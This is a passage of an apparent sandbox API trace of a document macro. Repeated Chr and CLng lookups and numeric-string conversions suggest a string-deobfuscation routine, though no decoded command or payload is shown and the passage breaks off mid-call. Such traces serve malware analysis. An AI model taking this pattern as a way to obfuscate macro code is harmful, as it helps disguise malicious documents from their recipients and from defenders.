[0059.014] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="936790") returned 7 [0059.014] VarI4FromStr (in: strIn="936790", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.014] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1FD2") returned 7 [0059.014] VarI4FromStr (in: strIn="&H1FD2", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.014] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="26390") returned 6 [0059.014] VarI4FromStr (in: strIn="26390", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.015] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H1C7") returned 6 [0059.015] VarI4FromStr (in: strIn="&H1C7", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.015] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="405469") returned 7 [0059.015] VarI4FromStr (in: strIn="405469", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.015] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H21B3") returned 7 [0059.015] VarI4FromStr (in: strIn="&H21B3", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.015] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="175592") returned 7 [0059.015] VarI4FromStr (in: strIn="175592", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.015] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HE98") returned 6 [0059.015] VarI4FromStr (in: strIn="&HE98", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.015] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.015] atoi (_Str="8596") returned 8596 [0059.015] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H220B") returned 7 [0059.016] VarI4FromStr (in: strIn="&H220B", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.016] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1130143") returned 8 [0059.016] VarI4FromStr (in: strIn="1130143", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.016] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H2519") returned 7 [0059.016] VarI4FromStr (in: strIn="&H2519", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.016] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="624750") returned 7 [0059.016] VarI4FromStr (in: strIn="624750", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.016] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1482") returned 7 [0059.016] VarI4FromStr (in: strIn="&H1482", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.016] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="24656") returned 6 [0059.016] VarI4FromStr (in: strIn="24656", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.017] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H218") returned 6 [0059.017] VarI4FromStr (in: strIn="&H218", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.017] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="534432") returned 7 [0059.017] VarI4FromStr (in: strIn="534432", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.017] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1250") returned 7 [0059.017] VarI4FromStr (in: strIn="&H1250", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.017] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="604116") returned 7 [0059.017] VarI4FromStr (in: strIn="604116", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.017] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1854") returned 7 [0059.017] VarI4FromStr (in: strIn="&H1854", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.017] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="258622") returned 7 [0059.017] VarI4FromStr (in: strIn="258622", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.018] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HA4F") returned 6 [0059.018] VarI4FromStr (in: strIn="&HA4F", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.018] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="805003") returned 7 [0059.018] VarI4FromStr (in: strIn="805003", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.018] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H206B") returned 7 [0059.018] VarI4FromStr (in: strIn="&H206B", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.018] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="589300") returned 7 [0059.018] VarI4FromStr (in: strIn="589300", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.018] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1705") returned 7 [0059.018] VarI4FromStr (in: strIn="&H1705", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.018] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.018] atoi (_Str="9014") returned 9014 [0059.019] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H2397") returned 7 [0059.019] VarI4FromStr (in: strIn="&H2397", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.019] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="813384") returned 7 [0059.019] VarI4FromStr (in: strIn="813384", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.019] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1B28") returned 7 [0059.019] VarI4FromStr (in: strIn="&H1B28", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.019] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="268400") returned 7 [0059.019] VarI4FromStr (in: strIn="268400", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.019] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H988") returned 6 [0059.019] VarI4FromStr (in: strIn="&H988", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.019] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="48990") returned 6 [0059.019] VarI4FromStr (in: strIn="48990", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.020] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H429") returned 6 [0059.020] VarI4FromStr (in: strIn="&H429", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.020] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.020] atoi (_Str="6664") returned 6664 [0059.020] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1A6B") returned 7 [0059.020] VarI4FromStr (in: strIn="&H1A6B", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.020] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.020] atoi (_Str="5642") returned 5642 [0059.020] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1679") returned 7 [0059.020] VarI4FromStr (in: strIn="&H1679", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.020] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="112379") returned 7 [0059.020] VarI4FromStr (in: strIn="112379", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.020] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H407") returned 6 [0059.021] VarI4FromStr (in: strIn="&H407", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.021] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.021] atoi (_Str="2799") returned 2799 [0059.021] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HB1E") returned 6 [0059.021] VarI4FromStr (in: strIn="&HB1E", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.021] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="352121") returned 7 [0059.021] VarI4FromStr (in: strIn="352121", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.021] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HB8F") returned 6 [0059.021] VarI4FromStr (in: strIn="&HB8F", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.021] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="334221") returned 7 [0059.021] VarI4FromStr 